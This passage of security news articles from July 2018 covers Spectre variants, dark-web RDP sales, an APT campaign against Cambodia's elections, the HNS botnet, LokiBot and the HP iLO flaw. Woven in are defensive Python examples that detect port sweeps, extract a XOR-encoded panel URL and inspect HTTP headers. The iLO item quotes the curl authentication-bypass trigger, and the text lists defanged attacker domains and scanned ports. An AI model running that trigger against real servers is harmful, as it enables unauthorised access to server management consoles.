Also in this case, the issue could be exploited by an attacker to bypass the Read/Write PTE flags and write code directly in read-only data memory, code metadata, and code pointers to avoid sandboxes.
“Spectre3.0, aka Meltdown, relies on lazy enforcement of User/Supervisor protection flags for page-table entries (PTEs). The same mechanism can also be used to bypass the Read/Write PTE flags. We introduce Spectre1.2, a minor variant of Spectre-v1 which depends on lazy PTE enforcement, similar to Spectre-v3. In a Spectre1.2 attack, speculative stores are allowed to overwrite read-only data, code pointers, and code metadata, including vtables, GOT/IAT, and control-flow mitigation metadata. As a result, sandboxing that depends on hardware enforcement of read-only memory is rendered ineffective,” continues the research paper.
ARM confirmed that the Spectre 1.1 flaw also affects its processors but did not say which ARM CPUs are affected.
Major tech firms, including Microsoft, Red Hat and Oracle, have released security advisories confirming that they are investigating the issues and the potential effects of the new Spectre variants.
“Microsoft is aware of a new publicly disclosed class of vulnerabilities referred to as “speculative execution side-channel attacks” that affect many modern processors and operating systems including Intel, AMD, and ARM. Note: this issue will affect other systems such as Android, Chrome, iOS, MacOS, so we advise customers to seek out guidance from those vendors.” reads the advisory published by Microsoft.
“An attacker who successfully exploited these vulnerabilities may be able to read privileged data across trust boundaries. In shared resource environments (such as exists in some cloud services configurations), these vulnerabilities could allow one virtual machine to improperly access information from another.”
Do you want to penetrate an airport network? RDP access to an internal machine goes for $10 on the dark web.
12.7.2018 securityaffairs Hacking
Access to a system at a major international airport via RDP (Remote Desktop Protocol) can be bought for only $10 on the Dark Web.
Experts at McAfee have discovered hackers offering RDP access to compromised machines worldwide while analyzing several black markets.
The researchers discovered shops offering between 15 and more than 40,000 RDP connections for sale; the largest is the Russian Ultimate Anonymity Service (UAS).
The second-largest RDP shop the experts researched is BlackPass, which offers the widest variety of products, including RDP access to computers.
Other RDP shops on the dark web are Flyded and xDedic, the latter discovered by experts from Kaspersky in June 2016.
Crooks are increasingly leveraging RDP connections in their attacks, many campaigns used RDP to distribute malware, such as the SamSam ransomware.
Cybercriminals have also started offering RDP access to high-value networks on the dark web for less than $1, as well as scanning services for accessible systems.
Sellers in major black marketplaces offer RDP accesses to a broad range of systems, ranging from Windows XP to Windows 10. The experts noticed that Windows 2008 and 2012 Server are the most popular with 11,000 and 6,500 accesses respectively.
“The advertised systems ranged from Windows XP through Windows 10. Windows 2008 and 2012 Server were the most abundant systems, with around 11,000 and 6,500, respectively, for sale.” reads the analysis published by McAfee.
“Prices ranged from around US $3 for a simple configuration to $19 for a high-bandwidth system that offered access with administrator rights.”
Experts also found access to systems running Windows Embedded Standard (or Windows IoT); the offers at UAS Shop and BlackPass included hundreds of identically configured machines associated with municipalities, housing associations, and healthcare institutions in the Netherlands. The black markets' offerings also include multiple government systems worldwide.
Analyzing the UAS Shop, the researchers discovered a recently added Windows Server 2008 R2 Standard machine available at only $10 that was located in a major International airport in the United States.
The seller was offering it with three user accounts: the administrator account and two others, one associated with a company specializing in airport security and building automation and the other with a company specializing in camera surveillance and video analytics for airports.
Such access can be very dangerous because it offers attackers an entry point into critical infrastructure.
“We did not explore the full level of access of these accounts, but a compromise could offer a great foothold and lateral movement through the network using tools such as Mimikatz,” explained McAfee.
The surprises did not end there: the researchers found an account on another system associated with a domain that appears to be related to “the airport’s automated transit system, the passenger transport system that connects terminals.”
“Now we know that attackers, like the SamSam group, can indeed use an RDP shop to gain access to a potential high-value ransomware victim. We found that access to a system associated with a major international airport can be bought for only $10—with no zero-day exploit, elaborate phishing campaign, or watering hole attack.” conclude the researchers.
“Governments and organizations spend billions of dollars every year to secure the computer systems we trust. But even a state-of-the-art solution cannot provide security when the backdoor is left open or carries only a simple padlock.”
China-based TEMP.Periscope APT targets Cambodia’s elections
12.7.2018 securityaffairs APT
FireEye uncovered a large-scale Chinese phishing and hacking campaign, run by the TEMP.Periscope APT group, aimed at Cambodia’s elections.
Security researchers at FireEye have uncovered a large-scale Chinese phishing and hacking campaign aimed at Cambodia’s elections.
The campaign distributed a remote access trojan (RAT) and ran a data exfiltration operation targeting the poll.
The experts from FireEye attributed the attacks to an APT group tracked as TEMP.Periscope, which in past operations targeted American engineering and maritime organizations.
FireEye found evidence of infection on systems used by election-related entities in Cambodia, including the National Election Commission, human rights advocates, an MP for the Cambodia National Rescue Party, two Cambodian diplomats in overseas posts, and some media outlets.
“FireEye has examined a range of TEMP.Periscope activity revealing extensive interest in Cambodia’s politics, with active compromises of multiple Cambodian entities related to the country’s electoral system. This includes compromises of Cambodian government entities charged with overseeing the elections, as well as the targeting of opposition figures.” reads the analysis published by FireEye.
“This campaign occurs in the run up to the country’s July 29, 2018, general elections.”
TEMP.Periscope reused infrastructure from other campaigns against other targets, including the defense industrial base in the United States and a chemical company based in Europe.
While analyzing this campaign, FireEye found files on three open indexes operated by the attackers, which gave the company insight into the group’s TTPs and its targets. The activity on these servers extends from at least April 2017 to the present, with the most recent operations focusing on Cambodia’s government and elections.
Two servers (chemscalere[.]com and scsnewstoday[.]com) are used as a typical command and control infrastructure and hosting sites, while a third, mlcdailynews[.]com, works as an active SCANBOX server.
SCANBOX is a malware family that FireEye has monitored in various campaigns since 2015; the presence of a SCANBOX server suggested TEMP.Periscope was also planning to target individuals with an interest in US-East Asia politics, Russia, and NATO affairs in forthcoming campaigns.
The servers contain both malware and logs. According to FireEye, analysis of the logs from the three servers revealed:
Potential actor logins from an IP address located in Hainan, China that was used to remotely access and administer the servers, and interact with malware deployed at victim organizations.
Malware command and control check-ins from victim organizations in the education, aviation, chemical, defense, government, maritime, and technology sectors across multiple regions. FireEye has notified all of the victims that we were able to identify.
The malware present on the servers included both new families (DADBOD, EVILTECH) and previously identified malware families (AIRBREAK, EVILTECH, HOMEFRY, MURKYTOP, HTRAN, and SCANBOX) .
The servers were administered by operators based in Hainan (one of the IP addresses, 112.66.188[.]28, is located in Hainan, China). The experts found two new malware families hosted on them, DADBOD and EVILTECH, alongside malware families detected in the past (AIRBREAK, EVILTECH, HOMEFRY, MURKYTOP, HTRAN, and SCANBOX).
The most active tools in this campaign were the AIRBREAK backdoor, the HOMEFRY password cracker and dumper, the LUNCHMONEY uploader and a command line reconnaissance tool called MURKYTOP.
Malware function details, as described by FireEye:
EVILTECH: During the infection process, EVILTECH is run on the system, which then causes a redirect and possibly the download of additional malware or a connection to another attacker-controlled system.
DADBOD (credential theft): DADBOD is a tool used to steal user cookies. Analysis of this malware is still ongoing.
The experts attributed the attacks to China. Other IP addresses involved in the campaign are associated with virtual private servers, but the researchers noticed artifacts indicating that in all cases the computers used to log in were configured with Chinese language settings.
“The activity uncovered here offers new insight into TEMP.Periscope’s activity,” concludes FireEye. “Notably, Cambodia has served as a reliable supporter of China’s South China Sea position in international forums such as ASEAN and is an important partner. While Cambodia is rated as Authoritarian by the Economist’s Democracy Index, the recent surprise upset of the ruling party in Malaysia may motivate China to closely monitor Cambodia’s July 29 elections.”
Hackers steal $13.5 Million from Israeli Bancor exchange
11.7.2018 securityaffairs CyberCrime
The Israel-based decentralized cryptocurrency exchange Bancor is the latest victim of a security breach in the cryptocurrency industry.
According to a statement published by the Bancor exchange, an unknown hacker has stolen roughly $13.5 million worth of cryptocurrency.
The security breach occurred on July 9, 2018 at 00:00 UTC; the attackers gained access to one of the wallets operated by the Israeli exchange, but no user wallets were compromised.
This morning (CEST) Bancor experienced a security breach. No user wallets were compromised. To complete the investigation, we have moved to maintenance and will be releasing a more detailed report shortly. We look forward to being back online as soon as possible.
The company moved its infrastructure to maintenance to conduct the investigation.
Bancor exchange doesn’t operate as a classic exchange platform, it used a complex mechanism based on smart contracts running on the Ethereum platform to improve the speed of transactions compared with classic exchange platforms.
“With Bancor exchange, every transaction is executed directly against a smart contract. This means that converting a cryptocurrency does not require matching two parties in real-time with opposite wants; rather, it can be completed by a single party directly through the token’s smart contract.” reads the company.
The attackers gained access to a company wallet and used it to withdraw $12.5 million (24,984 Ether (ETH)) from Bancor smart contracts, transferring the funds to a private wallet they controlled.
The attackers also withdrew 229,356,645 Pundi X (NPXS) ($1 million) from another wallet.
The attackers also withdrew 3,200,000 Bancor tokens (BNT) (roughly $10 million) that were obtained by Bancor last year as part of its ICO that raised over $150 million. Fortunately, a security feature in Bancor tokens allowed the company to freeze the transfers of these funds, making it impossible for the hackers to move them to other wallets.
“It is not possible to freeze the ETH and any other stolen tokens,” reads the statement published by Bancor.
“However, we are working together with dozens of cryptocurrency exchanges to trace the stolen funds and make it more difficult for the thief to liquidate them.”
Bancor did not reveal how the hackers breached its wallet and stole the funds.
Critical flaws patched in ISP Advanced Digital Broadcast Broadband devices
11.7.2018 securityaffairs Vulnerebility
Advanced Digital Broadcast has rolled out security patches to fix three critical vulnerabilities in its broadband gear.
Advanced Digital Broadcast has released patches for three critical vulnerabilities affecting broadband gateways. All ADB broadband gateways and routers based on the Epicentro platform are affected by the vulnerabilities.
The flaws were discovered nearly two years ago: a privilege escalation bug, an authorization bypass issue, and a local jailbreak bug.
Advanced Digital Broadcast manufactures routers and network devices for dozens of broadband and telco firms.
The vulnerabilities were first discovered in June 2016 by experts at SEC Consult Vulnerability Lab.
The company started rolling out the patches in July 2017.
Let’s see in detail the three flaws:
CVE-2018-13108 is a local root jailbreak flaw that can be exploited by leveraging a vulnerability in the network file sharing feature.
“By exploiting the local root vulnerability on affected and unpatched devices an attacker is able to gain full access to the device with highest privileges,” according to researchers. “Attackers are able to modify any settings that might have otherwise been prohibited by the ISP. It is possible to retrieve all stored user credentials (such as VoIP) or SSL private keys.”
Experts explained that the “network file sharing” feature of ADB broadband devices relies on a Samba daemon to give access to USB storage devices. The daemon runs with the highest access rights and exports the network shares with root user permissions, so attackers can abuse the Samba daemon running in the background to access the USB port.
CVE-2018-13109 is an authorization bypass vulnerability affecting some firmware versions used in ADB broadband devices. The flaw could be exploited by an attacker to gain access to device settings in the web interface that are otherwise forbidden to the user.
“By exploiting the authorization bypass vulnerability on affected and unpatched devices an attacker is able to gain access to settings that are otherwise forbidden for the user, e.g. through strict settings set by the ISP.” researchers wrote. “It is also possible to manipulate settings to e.g. enable the telnet server for remote access if it had been previously disabled by the ISP.”
CVE-2018-13110 is a privilege escalation vulnerability via Linux group manipulation that could be exploited by an attacker to gain access to the command line interface (CLI) of the device, even if the CLI was previously disabled by the ISP.
“By exploiting the group manipulation vulnerability on affected and unpatched devices an attacker is able to gain access to the command line interface (CLI) if previously disabled by the ISP.” researchers wrote.
“Depending on the feature-set of the CLI (ISP dependent) it is then possible to gain access to the whole configuration and manipulate settings in the web GUI and escalate privileges to highest access rights.”
ADB has released an updated firmware that addresses the flaws.
HNS Botnet evolves and targets cross-platform database solutions
11.7.2018 securityaffairs BotNet
The HNS (Hide and Seek) IoT botnet, originally discovered by Bitdefender in January, has evolved and now targets cross-platform database solutions.
Do you remember the Hide ‘N Seek (HNS) botnet?
The Hide ‘N Seek IoT botnet appeared in the threat landscape on January 10, when it was first spotted by malware researchers from Bitdefender. It then disappeared for a few days and reappeared a few weeks later, infecting more than 20,000 devices in less than a week.
Researchers at Bitdefender found similarities between the Hide ‘N Seek botnet and the Hajime botnet: unlike Mirai, Hajime doesn’t use C&C servers; instead, it implements a peer-to-peer network.
Bitdefender experts discovered that the Hide ‘N Seek botnet exploited the CVE-2016-10401 flaw and other vulnerabilities to propagate malicious code and steal user data.
The HNS botnet looks for systems to infect by scanning the Internet on the fixed TCP ports 80, 8080, 2480, 5984 and 23, as well as on random ports. The HNS botnet borrows code from the Mirai botnet.
Hide ‘N Seek now also targets cross-platform database solutions, and it is currently the first IoT malware that implements a persistence mechanism to keep devices infected after reboots.
“P2P-like botnets are hard to take down, and the HNS botnet has been continuously updated over the past few months,” reads the analysis published by Netlab Qihoo 360 researchers.
“some major updates we see:
Added exploits for AVTECH devices (webcam, webcam), CISCO Linksys router, JAWS/1.0 web server, Apache CouchDB, OrientDB; with the two devices mentioned in the original report, HNS currently supports 7 exploiting methods all together
Hard-coded P2P node addresses have been increased to 171;
In addition, we observed that the HNS botnet adds a cpuminer mining program, it is not functioning properly yet.
In particular, with the added support of OrientDB and CouchDB database servers, HNS is no longer just an IoT botnet, but a cross-platform botnet now.”
According to Netlab, the Hide ‘N Seek (HNS) botnet now targets the following types of devices using the following exploits:
(new) AVTECH RCE
(new) CISCO Linksys Router RCE
(new) JAW/1.0 RCE
(new) OrientDB RCE
(new) CouchDB RCE
Experts pointed out that HNS has also started dropping a miner payload, but the good news is that it is not functioning properly yet.
Further technical details on the Hide ‘N Seek botnet, including the IoCs, are reported in the analysis published by the Netlab team.
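The port list above lends itself to a simple detection rule. The following is an added example, not code from the article or from Netlab: it walks constructed connection-log lines (the log format is assumed) and flags any source address that probes at least three of the fixed HNS ports (80, 8080, 2480, 5984, 23) within a ten-minute window, so a source that touches the same ports hours apart stays below the threshold.

```python
"""Flag sources sweeping the TCP ports the article lists for HNS scanning.

Added example, not from the article or Netlab. Log lines and their format
are constructed for this demonstration:
    "<ISO timestamp> <src> -> <dst>:<dport> SYN"
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Fixed ports the article says HNS scans; 2480 (OrientDB) and 5984 (CouchDB)
# are the database ports that turned HNS into a cross-platform botnet.
HNS_PORTS = {80, 8080, 2480, 5984, 23}
MIN_PORTS = 3                    # distinct HNS ports one source must hit
WINDOW = timedelta(minutes=10)   # ...within a span this long

# Constructed sample: one fast sweep, one benign client, one slow probe.
SAMPLE_LOG = """\
2018-07-10T08:00:01 198.51.100.7 -> 192.0.2.10:80 SYN
2018-07-10T08:00:03 198.51.100.7 -> 192.0.2.10:8080 SYN
2018-07-10T08:00:05 198.51.100.7 -> 192.0.2.10:2480 SYN
2018-07-10T08:00:06 198.51.100.7 -> 192.0.2.10:5984 SYN
2018-07-10T08:00:09 198.51.100.7 -> 192.0.2.10:23 SYN
2018-07-10T08:01:00 203.0.113.5 -> 192.0.2.10:443 SYN
2018-07-10T08:01:04 203.0.113.5 -> 192.0.2.10:80 SYN
2018-07-10T08:30:00 198.51.100.9 -> 192.0.2.11:2480 SYN
2018-07-10T09:30:00 198.51.100.9 -> 192.0.2.11:5984 SYN
2018-07-10T10:30:00 198.51.100.9 -> 192.0.2.11:23 SYN
"""


def parse_line(line):
    """Return (timestamp, src_ip, dport) for one log line, or None if malformed."""
    parts = line.split()
    if len(parts) != 5 or parts[2] != "->":
        return None
    try:
        ts = datetime.fromisoformat(parts[0])
        dport = int(parts[3].rsplit(":", 1)[1])
    except (ValueError, IndexError):
        return None
    return ts, parts[1], dport


def find_hns_sweeps(log_text, min_ports=MIN_PORTS, window=WINDOW):
    """Map each suspicious source to the sorted HNS ports it probed.

    A source is reported when it hits at least `min_ports` distinct HNS ports
    within any span no longer than `window`, so slow, spread-out probes stay
    below the threshold.
    """
    hits = defaultdict(list)           # src_ip -> [(timestamp, dport), ...]
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed and parsed[2] in HNS_PORTS:
            ts, src, dport = parsed
            hits[src].append((ts, dport))

    sweeps = {}
    for src, events in hits.items():
        events.sort()
        # Anchor the window at each event in turn, collect the ports that
        # follow within `window`, and stop at the first anchor that qualifies.
        for i, (start, _) in enumerate(events):
            ports = {p for t, p in events[i:] if t - start <= window}
            if len(ports) >= min_ports:
                sweeps[src] = sorted(ports)
                break
    return sweeps


if __name__ == "__main__":
    for src, ports in find_hns_sweeps(SAMPLE_LOG).items():
        print(f"{src} swept HNS ports {ports}")
```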
Smart Speaker Banking Is Coming to a Device Near You, But Is It Secure?
11.7.2018 securityaffairs Virus
Smart speaker banking is coming to a device near you. What are the cyber risks associated with its use? Does it create a new opportunity for attackers?
The popularity of voice-activated smart speakers like the Google Home and Amazon Echo has made brands and industries realize there’s adequate demand for technology that lets people accomplish things just by speaking.
They can order items, check traffic in their areas and search for information, among other conveniences.
Soon, smart speaker owners can take care of their banking needs. Should you consider taking that approach, too?
Check Balances and Pay Credit Card Bills
Regional brand U.S. Bank is the first establishment in the financial industry to unveil online banking opportunities that work with all three virtual assistants — Alexa, Google Assistant and Siri — making it relevant to a significant segment of the market.
After a soft launch, U.S. Bank started marketing the option to its customers in June 2018. For now, customers can check their account balances and make credit card or mortgage payments. The brand is also reportedly considering letting people transfer money to other account holders.
Also, smaller banks and credit unions offer similar functionality. Capital One and American Express let people pay bills through their smart speakers, too.
Smart Speakers Could Reveal Private Details
Most skills for the Amazon Echo that emphasize productivity give audible information to users. The idea is that they can do things without fumbling with their phones or otherwise using their hands.
The banking apps that work with Amazon and Google smart speakers give information through spoken responses to verbal prompts.
In contrast, people using Apple’s Siri assistant can do some banking tasks with iOS apps that support Siri, but they only see their information displayed on screens. Banking skills are not available on Apple’s HomePod speaker yet, and the company hasn’t divulged if they’re on the horizon.
Imagine the privacy concerns if you use a smart speaker banking app, and it lets your mother-in-law — who’s temporarily living with you — know how much money is in your account because she overhears the speaker’s reply to your prompt?
That’s an example of how a feature that’s supposed to be convenient could instead broadcast sensitive details to others who are nearby.
Users Must Set Up PINs
The banks that provide information to smart speaker owners require people to set up four-digit PINs and recommend that they be different from the individuals’ ATM PINs. As with passwords, there are recommended ways to pick a good PIN. However, not everyone follows them. Many take the risk of prioritizing convenience over security by setting up PINs that are easy to remember — but equally easy for others to guess.
Also, although the Google Assistant and Amazon’s Alexa support individual voice recognition, U.S. Bank hasn’t enabled that feature on the platform yet. Security analysts point out that even with voice recognition technology in place, hackers could still record a person speaking and play it back for the speaker to detect later.
And the PINs people enter at ATMs aren’t as secure as many people think. Criminals can use hidden cameras or false keypads to capture PINs as people put them into the machines.
Research also found that the motion-sensitive components of smartwatches could capture PIN data, allowing hackers to figure out the numbers people enter with up to 80 percent accuracy on the first attempt.
You can probably envision a scenario where a determined hacker devises a plan to hear a person’s spoken PIN sent to a smart speaker, too.
For example, maybe a smart speaker owner is in the habit of using such a device that’s on a nightstand a few feet away from a window to check a bank account balance each morning. If someone realizes that individual often keeps that window open in hot weather and learns their banking routine, they could wait outside the window to hear the details.
The Potential for Misunderstood Transfer Requests
If you eventually have the option to transfer money with a smart speaker, that option may not be failsafe, either, especially if you have to utter the person’s name to confirm your request.
Smart speakers have highly sensitive microphones, but they still don’t pick up on everything correctly. In one case, a toddler said “Alexa, play Digger Digger,” and an Amazon Echo Dot started providing pornographic content while adults in the background frantically told it to stop.
What if a smart speaker misinterprets either the name of the person who should receive your money or the amount you want to send? In either case, you could find yourself dealing with a tricky situation that’s difficult to rectify.
Hackers Always Find Ways to Orchestrate Attacks
As with anything else, it’s crucial to weigh the pros and cons. Sure, it might be great to pay your credit card bill with only a vocal command, but are you willing to let a potentially vulnerable smart speaker hold some of your most sensitive financial information?
Because the possibility of banking with your smart speaker is still so new, speculation primarily informs musings about the security risks that convenience could bring. If smart speaker banking becomes a mainstream practice, hackers will undoubtedly intensify their efforts to break into the speakers and get details that could compromise victims’ financial situations.
About the Author:
Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.
Hacker hijacked original LokiBot malware to sell samples in the wild
11.7.2018 securityaffairs Virus
An expert found evidence that the LokiBot malware samples currently being distributed were “hijacked” by a third actor.
According to the researcher who goes by the Twitter handle “d00rt,” the LokiBot samples being distributed in the wild are modified versions of the original sample.
I just released an article with evidence that demonstrates the currently distributed #LokiBot infostealer samples were "hijacked" by a third actor. In the repository there are scripts for extracting the static config and code for disinfecting. https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf
The LokiBot malware has been active since 2015; it is an infostealer that has been involved in many malspam campaigns aimed at harvesting credentials from web browsers, email clients and admin tools, and it has also been used to target cryptocoin-wallet owners.
The original LokiBot malware was developed and sold online by a hacker who goes by the alias “lokistov” (aka Carter).
The malicious code was initially advertised on many hacking forums for up to $300; later, other threat actors started offering it for less than $80 in the cybercrime underground.
According to d00rt, there is an explanation for this proliferation: a threat actor may have “hijacked” the original malware and, even without direct access to the original source code, was able to offer other hackers the possibility to set up their own domains for receiving the stolen data.
The expert reversed many pieces of the malware and found five references to the C&C server: four of them are encrypted using the Triple DES algorithm and one using a simple XOR cipher.
The malware uses the function “Decrypt3DESstring” to decrypt the encrypted strings and get the URL of the command-and-control server.
According to the expert, the Decrypt3DESstring function found in the sample he analyzed is different from the one in previous variants of the LokiBot malware.
The new Decrypt3DESstring function discovered in the new samples always returns the value of the XOR-protected string instead of the Triple DES strings.
“The 3DES protected URLs are always the same in the all of the LokiBot samples of this version,” the researcher wrote.
“Therefore, those URLs are never used. Decrypt3DESstring returns a 3DES decrypted buffer. This should be the ideal behavior of this function, but as was described before, each time Decrypt3DESstring is called, it returns a decrypted url with XOR or encrypted url with XOR.”
The expert explained that anyone with a new sample of LokiBot could use a simple hex editor to modify the program and add custom URLs for receiving the stolen data.
“The newest (or the most extended) LokiBot samples are patched. There is a new section called “x” where is a xored url. That url is the control panel url. Keeping that in mind, it would be very easy to create a builder, for creating LokiBot samples with a new control panel and sell it. You could change the xored url with another xored url using a hex editor or with a simple script.” continues the analysis published by the expert.
“There exists a builder in the underground forums which is able to create new LokiBot samples with a custom control panel. As I explained before, this builder encrypts the control panel with xor and writes it in the “x” section.”
d00rt discovered several LokiBot samples available for sale on the underground market that were patched by using a builder available in the underground forums.
Meanwhile, the author of the LokiBot malware has launched a new version 2.0 and is offering it on many forums.
The decryption function was also used to get the registry values required for making the malware persistent on a system, but since the patched decryption function only returns a URL, the new LokiBot samples fail to restart after the device reboots.
The expert also discovered that the modification introduced to patch the malware introduces a couple of bugs in the malicious code.
Some strings of the LokiBot malware are encrypted, and the malware uses the function Decrypt3DESstring to decrypt them. After patching, this function always returns the same string: the XORed URL located in the “x” section.
“The following is the registry key name used in persistence:
This registry key is encrypted using 3DES algorithm. When the patched LokiBot tries to get persistence, it uses Decrypt3DESstring to decrypt the registry key name. But because that function is patched, the returned string is the url at “x” section, instead of the registry key.
Further technical details for the threat are reported in the research paper published by the expert on GitHub.
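An analyst triaging one of these patched samples wants the panel URL out of the “x” section without running anything. The block below is an added example, not code from d00rt’s repository: it parses the PE section table with the standard library only, then brute-forces a single-byte XOR key and accepts the decoding that starts with “http”. The single-byte key is an assumption for this demonstration (the article only says the URL is XORed), and the PE image it operates on is constructed inline, an inert file with no executable code.

```python
"""Recover the XORed control-panel URL from the "x" section of a PE file.

Added example, not from d00rt's repository. Assumes a single-byte XOR key
(the article only says the URL in section "x" is XORed). The PE image used
below is constructed here for demonstration and contains no executable code.
"""
import struct

SECTION_HDR = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER layout, 40 bytes


def pe_sections(data):
    """Yield (name, raw_bytes) for every section of a PE image held in memory."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # COFF header follows the signature: NumberOfSections at +2, then three
    # 4-byte fields we skip, then SizeOfOptionalHeader at +16.
    n_sections, opt_size = struct.unpack_from("<H12xH", data, pe_off + 6)
    table = pe_off + 24 + opt_size                            # section table
    for i in range(n_sections):
        fields = struct.unpack_from(SECTION_HDR, data, table + 40 * i)
        name, raw_size, raw_ptr = fields[0], fields[3], fields[4]
        yield (name.rstrip(b"\0").decode("ascii", "replace"),
               data[raw_ptr:raw_ptr + raw_size])


def xor_decode_url(blob):
    """Try every single-byte key; return (key, url) for the first decoding that
    starts with "http", or None. The URL is read up to its NUL terminator."""
    for key in range(256):
        plain = bytes(b ^ key for b in blob)
        if plain.startswith(b"http"):
            url = plain.split(b"\0", 1)[0]
            return key, url.decode("ascii", "replace")
    return None


def extract_panel_url(data):
    """Return (key, url) from the "x" section, or None if the section is
    absent or does not decode to a URL."""
    for name, raw in pe_sections(data):
        if name == "x":
            return xor_decode_url(raw)
    return None


def make_constructed_pe(url, key, with_x=True, align=0x200):
    """Build an inert PE image (constructed test data, no real code) with a
    .text section of NOP bytes and, optionally, an "x" section holding
    `url` plus its NUL terminator XORed with `key`."""
    text_raw = (b"\x90" * 16).ljust(align, b"\0")
    x_raw = bytes(b ^ key for b in url.encode() + b"\0").ljust(align, b"\0")
    n_sections = 2 if with_x else 1
    pe_off = 0x40
    hdr_size = -(-(pe_off + 24 + 40 * n_sections) // align) * align  # round up
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", pe_off)
    coff = struct.pack("<HHIIIHH", 0x14C, n_sections, 0, 0, 0, 0, 0x0102)
    headers = dos + b"PE\0\0" + coff
    headers += struct.pack(SECTION_HDR, b".text", len(text_raw), 0x1000, align,
                           hdr_size, 0, 0, 0, 0, 0x60000020)
    if with_x:
        headers += struct.pack(SECTION_HDR, b"x", len(x_raw), 0x2000, align,
                               hdr_size + align, 0, 0, 0, 0, 0x40000040)
    image = headers.ljust(hdr_size, b"\0") + text_raw
    return image + x_raw if with_x else image


if __name__ == "__main__":
    sample = make_constructed_pe("http://panel.example.invalid/gate", 0x5A)
    print(extract_panel_url(sample))
```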
Timehop data breach, data from 21 million users exposed
11.7.2018 securityaffairs Incident
Timehop, the service that aims to help people in finding new ways to connect with each other by analyzing past activities, has been hacked.
Timehop is a service that aims to help people in finding new ways to connect with each other by analyzing past activities.
“Timehop created the digital nostalgia category and continues to be THE team reinventing reminiscing for the digital era. We have more “old” photos and content than ever before, yet most of the internet focuses on “new”.” reads its website.
The Timehop service leverages posts from many social networks to build its own “memories” and uses them to create new connections, but something went wrong.
The company admitted that data describing 21 million members may have been exposed.
Unknown attackers breached its systems; the company discovered the intrusion while the hackers were exfiltrating the data.
“On July 4, 2018, Timehop experienced a network intrusion that led to a breach of some of your data. We learned of the breach while it was still in progress, and were able to interrupt it, but data was taken. While our investigation into this incident (and the possibility of any earlier ones that may have occurred) continues, we are writing to provide our users and partners with all the relevant information as quickly as possible.” reads the data breach notification published by the company.
Stolen data includes names, email addresses, and some phone numbers, while no private/direct messages, financial data, or social media or photo content, or Timehop data including streaks were exposed.
The company pointed out that none of the users’ “memories” – the social media posts and photos that Timehop stores – were accessed by the attackers.
The company admitted that the hackers obtained access credentials for its cloud computing environment, which, remarkably, was not protected by multifactor authentication.
The security team locked out the attackers two hours and nineteen minutes after discovering the intrusion.
The attackers also accessed the keys that let Timehop read and show users their social media posts (but not private messages). In response to the incident, the company’s IT staff deactivated them, which means that users will have to re-authenticate in the app.
The bad news is that the security breach also exposed access tokens used by Timehop to access other social networks such as Twitter, Facebook, and Instagram. Timehop tried to downplay the problem explaining that the tokens have been quickly revoked and currently don’t work.
“Second, we want to be clear that these tokens do not give anyone (including Timehop) access to Facebook Messenger, or Direct Messages on Twitter or Instagram, or things that your friends post to your Facebook wall. In general, Timehop only has access to social media posts you post yourself to your profile.” continues the company’s notification. “However, it is important that we tell you that there was a short time window during which it was theoretically possible for unauthorized users to access those posts – again, we have no evidence that this actually happened.”
Timehop is advising users who provided a phone number for authentication to take additional security precautions with their cellular provider to ensure that their number cannot be ported.
The company has now taken steps to improve the security of its architecture, including the adoption of multifactor authentication to secure authorization and access controls on all accounts.
Technical details about the incident have been published in this post.
HP iLO servers running outdated firmware could be remotely hacked
11.7.2018 securityaffairs Hacking
Hewlett Packard Integrated Lights-Out 4 (HP iLO 4) servers are affected by a critical authentication bypass vulnerability; technical details and PoC code have been published online.
The flaw, tracked as CVE-2017-12542, received a severity score of 9.8 out of 10 because it is very simple to exploit.
“Integrated Lights-Out, or iLO, is a proprietary embedded server management technology by Hewlett-Packard which provides out-of-band management facilities. The physical connection is an Ethernet port that can be found on most Proliant servers and microservers of the 300 and above series.” reads Wikipedia.
iLO cards allow administrators to perform a broad range of management activities on a company network, including installing firmware remotely and accessing a remote console.
The flaw was discovered last year by three security researchers (Fabien Périgaud from Synacktiv, Alexandre Gazet from Airbus, and the independent security researcher Joffrey Czarny) and potentially puts any iLO server exposed online at risk.
The flaw could be exploited by a remote attacker to access HP iLO consoles, extract cleartext passwords, execute malware, and even replace the iLO firmware.
The experts discovered that it is possible to exploit the issue with a cURL request whose Connection header contains 29 “A” characters:
curl -H "Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
In the following images, the experts demonstrate how to bypass iLO authentication, in this case how to retrieve a local user’s password in cleartext.
The good news is that HP addressed the flaw in August 2017 with the release of iLO 4 firmware version 2.54; system administrators therefore need to upgrade their servers.
The flaw affects HP iLO 4 servers running firmware version prior to 2.53.
The experts presented their findings at several security conferences, including ReCon Brussels (slides, research paper) and SSTIC 2018.
The PoC exploits for the flaw are available at the following URLs:
A Metasploit module for the flaw is available here.
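The one-line cURL test above also suggests what a defender in front of a management network can look for. The block below is an added example, not code from the researchers or from HP: it parses a raw HTTP/1.x request and flags a Connection header longer than 28 bytes (legitimate values are short tokens such as keep-alive or close) or carrying tokens outside an allow-list; the sample requests, host name and allow-list are constructed for this demonstration.

```python
"""Inspect HTTP requests for abnormal Connection headers, the field used by
the CVE-2017-12542 cURL test quoted above (29 "A" characters).

Added example, not from the researchers or HP. Sample requests are constructed;
the allow-list is a starting point to tune against the traffic legitimately
reaching the management network (Connection may also name other hop-by-hop
headers to drop).
"""
MAX_CONNECTION_LEN = 28   # 29 bytes is the length of the published test string
ALLOWED_TOKENS = {"keep-alive", "close", "upgrade", "te"}

# Constructed sample requests against an iLO management interface.
BENIGN_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: ilo.example.invalid\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)
SUSPECT_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: ilo.example.invalid\r\n"
    "Connection: " + "A" * 29 + "\r\n"
    "\r\n"
)


def parse_request(raw_request):
    """Split raw HTTP/1.x request text into (request_line, {lower-name: value}).

    Header names are case-insensitive, so they are lowered; a header that is
    repeated is joined with ", " as HTTP list headers are, so splitting the
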